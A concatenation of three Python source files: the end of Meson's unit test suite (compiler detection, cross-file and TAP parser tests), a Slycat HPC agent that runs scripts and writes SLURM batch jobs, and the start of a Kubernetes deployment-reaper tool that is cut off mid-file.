raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
if os.path.exists('/etc/debian_version'):
rc = subprocess.call(['pkg-config', '--cflags', 'python2'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc != 0:
# Python 2 will be removed in Debian Bullseye, thus we must
# remove the build dependency on python2-dev. Keep the tests
# but only run them if dev packages are available.
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', 'python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functioality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
pass
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
sys.exit(main())
|
slycat-docker-agent.py
|
#!/bin/env python
# Copyright (c) 2013, 2018 National Technology and Engineering Solutions of Sandia, LLC . Under the terms of Contract
# DE-NA0003525 with National Technology and Engineering Solutions of Sandia, LLC, the U.S. Government
# retains certain rights in this software.
try:
import io as StringIO
except ImportError:
import io
import json
import os
import subprocess
import sys
import tempfile
import agent
import threading
import traceback
import logging
import random
class Agent(agent.Agent):
"""
"""
def __init__(self):
"""
add the list of scripts we want to be able to call
"""
agent.Agent.__init__(self)
self.command_list = ["module_name", "wckey", "nnodes", "partition", "ntasks_per_node",
"time_hours", "time_minutes", "time_seconds", "working_dir"]
def get_hpc_run_string(self, command):
pass
def check_hpc_params(self, command_dict):
for _ in self.command_list:
if _ not in command_dict:
raise Exception("missing %s hpc param" % _)
def run_remote_command(self, command):
command = command["command"]
run_commands = []
# get the command scripts that were sent to the agent
jid = random.randint(10000000, 99999999)
log = self.create_job_logger(jid)
for command_script in command["scripts"]:
# compare the payload commands to the registered commands on the agent
if command_script != "":
run_commands.append(self.get_script_run_string(command_script) + " --log_file " + str(jid) + ".log")
if not run_commands:
results = {"ok": False, "message": "could not create a run command did you register your script with "
"slycat?"}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
return
command["run_command"] = run_commands
# if "background_task" in command and command["background_task"]:
output = ["running task in background", "running task in background"]
if command["hpc"]["is_hpc_job"]:
self.check_hpc_params(command["hpc"]["parameters"])
module_name = command["hpc"]["parameters"]["module_name"]
wckey = command["hpc"]["parameters"]["wckey"]
nnodes = command["hpc"]["parameters"]["nnodes"]
partition = command["hpc"]["parameters"]["partition"]
ntasks_per_node = command["hpc"]["parameters"]["ntasks_per_node"]
time_hours = command["hpc"]["parameters"]["time_hours"]
time_minutes = command["hpc"]["parameters"]["time_minutes"]
time_seconds = command["hpc"]["parameters"]["time_seconds"]
working_dir = command["hpc"]["parameters"]["working_dir"]
output = ["running batch job", "running batch job"]
try:
self.run_shell_command("mkdir -p %s" % working_dir)
except Exception as e:
output[0] = e.message
tmp_file = tempfile.NamedTemporaryFile(delete=False, dir=working_dir)
self.generate_batch(module_name, wckey, nnodes, partition, ntasks_per_node, time_hours, time_minutes,
time_seconds, run_commands,
tmp_file)
# with open(tmp_file.name, 'r') as myfile:
# data = myfile.read().replace('\n', '')
output[0], output[1] = self.run_shell_command("sbatch %s" % tmp_file.name, jid, True)
else:
try:
log("[COMMAND length] %s" % len(run_commands))
for command in run_commands:
log("[COMMAND] %s" % command)
background_thread = threading.Thread(target=self.run_shell_command, args=(command, jid, True,))
background_thread.start()
except Exception as e:
output[0] = traceback.format_exc()
results = {
"message": "ran the remote command",
"ok": True,
"jid": jid,
"command": command,
"output": output[0],
"errors": output[1],
"log_file_path": os.path.abspath(str(jid) + ".log"),
"available_scripts": [
{
"name": script["name"],
"description": script["description"],
"parameters": script["parameters"]
}
for script in self.scripts]
}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def run_shell_command(self, command, jid=0, log_to_file=False):
# create log file in the users directory for later polling
if log_to_file:
log = self.create_job_logger(jid)
try:
if log_to_file:
log("[STARTED]")
command = command.split(' ')
# remove empty list values
for _ in command:
if _ == "":
command.remove("")
# open process to run script
p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if log_to_file:
log("[RUNNING]")
# execute script
value1, value2 = p.communicate()
if log_to_file:
log(str(value1))
log("[FINISHED]")
return value1, value2
else:
return value1, value2
except Exception as e:
log("[FAILED]")
return ["FAILED", "FAILED"]
# print traceback.format_exc()
def check_agent_job(self, command):
results = {
"ok": True,
"jid": command["command"]["jid"],
"status": "[UNKNOWN]",
"status_list": self._status_list
}
try:
with open(str(command["command"]["jid"]) + '.log') as log_file:
for line in log_file:
if line.strip(' \t\n\r') in self._status_list:
results["status"] = line.strip(' \t\n\r')
except IOError:
sys.stdout.write("%s\n" % json.dumps({"ok": False, "message": "file not found: job id log file is "
"probably missung"}))
sys.stdout.flush()
except Exception as e:
self.log.log(logging.INFO, traceback.format_exc())
sys.stdout.write("%s\n" % json.dumps({"ok": False, "message": e}))
sys.stdout.flush()
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def launch(self, command):
output = self.run_shell_command(command["command"])
results = {
"ok": True,
"command": command["command"],
"output": output[0],
"errors": output[1]
}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def submit_batch(self, command):
output = self.run_shell_command(command["command"])
results = {
"ok": True,
"filename": command["command"],
"output": output[0],
"errors": output[1]
}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def checkjob(self, command):
results = {
"ok": True,
"jid": command["command"]
}
try:
# /job_log.txt
results["output"], results["errors"] = ("COMPLETED", "COMPLETED")
except OSError as e:
sys.stdout.write("%s\n" % json.dumps({"ok": False, "message": e}))
sys.stdout.flush()
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def cancel_job(self, command):
output = self.run_shell_command("scancel %s" % command["command"]) # command is jid here
results = {
"ok": True,
"jid": command["command"],
"output": output[0],
"errors": output[1]
}
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def get_job_output(self, command):
results = {
"ok": True,
"jid": command["command"]["jid"]
}
path = command["command"]["path"]
f = path + "slurm-%s.out" % results["jid"]
if os.path.isfile(f):
results["output"], results["errors"] = self.run_shell_command("cat %s" % f)
else:
results["output"] = "see errors"
results["errors"] = "the file %s does not exist." % f
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
def generate_batch(self, module_name, wckey, nnodes, partition, ntasks_per_node, time_hours, time_minutes,
time_seconds, fn,
tmp_file):
f = tmp_file
f.write("#!/bin/bash\n\n")
f.write("export SLYCAT_HOME=\/home\/slycat\/src\/slycat\n")
f.write("#SBATCH --account=%s\n" % wckey)
f.write("#SBATCH --job-name=slycat-tmp\n")
f.write("#SBATCH --partition=%s\n\n" % partition)
f.write("#SBATCH --nodes=%s\n" % nnodes)
f.write("#SBATCH --ntasks-per-node=%s\n" % ntasks_per_node)
f.write("#SBATCH --time=%s:%s:%s\n" % (time_hours, time_minutes, time_seconds))
f.write("echo \"RUNNING\" > job_log.txt\n")
# f.write("ipython profile create\n")
# f.write("echo \"Creating profile ${profile}\"\n")
# f.write("ipcontroller --ip='*' &\n")
# f.write("ipcluster start -n 4&\n")
f.write("echo \"Launching controller\"\n")
f.write("echo \"RUNNING\" > job_log.txt\n")
f.write("sleep 1m\n")
f.write("echo \"Launching job\"\n")
for c in fn:
f.write("%s >> outfile.txt\n" % c)
f.write("echo \"COMPLETE\" > job_log.txt\n")
# f.write("pkill -f ipcontroller \n")
# f.write("pkill -f ipcluster \n")
# f.write("pkill -f python \n")
f.close()
def remote_command(self, command):
"""
command to be run on the remote machine
:param command: json command
:return:
"""
pass
def run_function(self, command):
results = {
"ok": True,
"output": -1,
"temp_file": ""
}
module_name = command["command"]["module_name"]
wckey = command["command"]["wckey"]
nnodes = command["command"]["nnodes"]
partition = command["command"]["partition"]
ntasks_per_node = command["command"]["ntasks_per_node"]
time_hours = command["command"]["time_hours"]
time_minutes = command["command"]["time_minutes"]
time_seconds = command["command"]["time_seconds"]
fn = command["command"]["fn"]
# uid = command["command"]["uid"]
working_dir = command["command"]["working_dir"]
try:
self.run_shell_command("mkdir -p %s" % working_dir)
except Exception:
pass
tmp_file = tempfile.NamedTemporaryFile(delete=False, dir=working_dir)
self.generate_batch(module_name, wckey, nnodes, partition, ntasks_per_node, time_hours, time_minutes,
time_seconds, fn,
tmp_file)
with open(tmp_file.name, 'r') as myfile:
data = myfile.read().replace('\n', '')
results["temp_file"] = data
self.run_shell_command("chmod 755 %s" % tmp_file.name)
# print "starting"
# print tmp_file.name
try:
# print (".%s &> /dev/null" % tmp_file.name)
# p = Process(target=self.run_shell_command, args=(("sh %s >> outfile.txt" % tmp_file.name),))
# p.start()
t = threading.Thread(target=self.run_shell_command, args=("sh %s &>/dev/null &; disown" % tmp_file.name,))
t.start()
results["working_dir"] = working_dir
results["errors"] = None
results["output"] = "1234567 aids"
except Exception:
raise
# print "running"
sys.stdout.write("%s\n" % json.dumps(results))
sys.stdout.flush()
if __name__ == "__main__":
slurm_cluster_agent = Agent()
slurm_cluster_agent.run()
|
reaper.py
|
#!/usr/bin/env python3
import logging
import os
import signal
import sys
import threading
import click
import typing
from datetime import datetime
from kubernetes import client, config
from util import label_selector, parse_time, parse_duration, time_to_str
from logging import getLogger
logger = getLogger(__name__)
log_stream_handler = logging.StreamHandler(stream=sys.stdout)
log_stream_handler.setFormatter(logging.Formatter('%(asctime)s - %(levelname)s - %(message)s'))
logger.addHandler(log_stream_handler)
@click.command()
@click.pass_context
@click.option('--dryrun', '-n', is_flag=True, type=click.STRING, help="Do not restart, only log events")
@click.option('--verbose', '-v', count=True, help="Change the verbosity of the logs")
@click.option('--interval', '-i', required=True, type=click.STRING, default='60s', envvar='DEPLOYMENT_REAPER_INTERVAL', help='How often a reaping cycle should occur')
@click.option('--backoff-period', required=True, type=click.STRING, default='5m', envvar='DEPLOYMENT_REAPER_BACKOFF_PERIOD', help='The duration between the time a deployment is restarted and allowed to be restarted again')
@click.option('--default-max-age', required=True, type=click.STRING, envvar='DEPLOYMENT_REAPER_DEFAULT_MAX_AGE', help='The default maximum age of a container if no max-age label is provided')
def reaper(context, dryrun, verbose, interval, backoff_period, default_max_age):
context.obj = {
'dryrun': dryrun,
'verbosity': verbose,
'interval': interval,
'backoff_period': backoff_period,
'default_max_age': default_max_age,
'managed_label': os.getenv('', 'reaper.kubernetes.io/managed'),
'max_age_label': os.getenv('', 'reaper.kubernetes.io/max-age'),
'restart_label': os.getenv('', 'reaper.kubernetes.io/restarted-on'),
}
logger.setLevel(max(0, 20 - (verbose * 10)))
config.load_kube_config()
cycle(context)
stopped = threading.Event()
def loop():
while not stopped.wait(parse_duration(interval).seconds):
cycle(context)
signal.signal(signal.SIGINT, lambda sig, frame: stopped.set())
runner = threading.Thread(target=loop)
runner.daemon = True
runner.start()
runner.join()
def cycle(ctx):
logger.info('Cycling has started')
managed_objects = get_managed_objects(ctx)
logger.debug('will process %d found objects' % (len(managed_objects),))
for managed_object in managed_objects:
if object_aged(ctx, managed_object):
if not should_backoff(ctx, managed_object):
if ctx.obj['dryrun']:
logger.info('would restart object %s/%s' % (managed_object.metadata.namespace, managed_object.metadata.name))
else:
logger.info('restarting object %s/%s' % (managed_object.metadata.namespace, managed_object.metadata.name))
restart_managed_object(ctx, managed_object)
else:
logger.debug('backing off restart of object %s/%s' % (managed_object.metadata.namespace, managed_object.metadata.name))
else:
logger.debug('object %s/%s has not aged enough' % (managed_object.metadata.namespace, managed_object.metadata.name))
logger.info('Cycling has completed')
def should_backoff(ctx, managed_object: typing.Union[client.V1Deployment, client.V1DaemonSet]) -> bool:
if ctx.obj['restart_label'] in managed_object.metadata.annotations.keys():
last_restarted = parse_time(managed_object.metadata.annotations[ctx.obj['restart_label']])
backoff_period = parse_duration(ctx.obj['backoff_period'])
if datetime.utcnow() < last_restarted + backoff_period:
return True
return False
